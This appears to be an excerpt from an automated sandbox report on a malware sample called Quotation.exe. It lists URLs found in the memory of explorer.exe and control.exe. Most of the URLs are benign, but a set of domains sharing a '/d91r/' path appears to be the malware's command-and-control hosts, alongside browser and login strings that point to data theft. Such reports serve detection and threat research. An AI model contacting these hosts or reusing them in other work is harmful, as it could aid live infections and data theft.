Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexmart.xyzwww.finelinetackdirect.com
Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.eta-trader.net
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.eta-trader.net/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.eta-trader.net/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.eta-trader.netwww.funvacayflorida.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.finelinetackdirect.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.finelinetackdirect.com/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.finelinetackdirect.com/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.finelinetackdirect.comwww.maxhaidt.com
Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.flaviosilva.online
Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.flaviosilva.online/d91r/
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.flaviosilva.onlinewww.solya-shop.com
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funvacayflorida.com
Source: control.exe, 0000000D.00000002.26417273951.0000000007370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPsRxvfaRVW9F5TaX
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funvacayflorida.com/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.funvacayflorida.com/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ghostdyes.net
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ghostdyes.net/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ghostdyes.net/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ghostdyes.netwww.aznqmd.com
Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000626000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.interactive-media.ru
Source: explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.interactive-media.ru/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.interactive-media.ruwww.cardinialethanol.com
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.julesgifts.co.uk
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.julesgifts.co.uk/d91r/
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.julesgifts.co.ukwww.aznqmd.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.com
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014958000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005FB8000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.com/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.com/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.com/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.comwww.ghostdyes.net
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.maxhaidt.comwww.julesgifts.co.uk
Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr String found in binary or memory: http://www.nero.com
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qx386.top
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qx386.top/d91r/
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qx386.top/d91r/_w7xz=bR5Glu
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.qx386.topwww.rt66omm.com
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rt66omm.com
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rt66omm.com/d91r/
Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rt66omm.comwww.decoraptor.store
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.solya-shop.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.solya-shop.com/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.solya-shop.com/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.solya-shop.comwww.buymyenergy.com
Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.texasgent.com
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.texasgent.com/d91r/
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.texasgent.com/d91r/6SE=F8zFuLn
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014E0E000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000646E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.texasgent.comwww.brightfms.com
Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000C.00000003.23178684870.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppz
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: explorer.exe, 0000000C.00000002.26418329458.0000000008F53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm3
Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS0Q#
Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSF
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/?Im
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000C.00000002.26441286993.00000000100A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22672138178.00000000100A6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?9l
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.22642464266.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132472100.0000000002B4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171896969.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002B4D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014634000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005C94000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: Quotation.exe, SolutionExplorerCLI.dll.1.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: Quotation.exe, SolutionExplorerCLI.dll.1.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: Quotation.exe String found in binary or memory: https://d.symcb.com/rpa0.
Source: explorer.exe, 0000000C.00000000.22673664093.000000001021C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.comI
Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr, System.dll0.1.dr String found in binary or memory: https://github.com/dotnet/runtime
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA38A54.img
Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://js.users.51.la/21113239.js
Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26404796231.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D3B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/0g
Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr String found in binary or memory: https://mozilla.org0
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000000C.00000002.26450887427.0000000013FEC000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000564C000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MU
Source: control.exe, 0000000D.00000002.26417532491.0000000007600000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
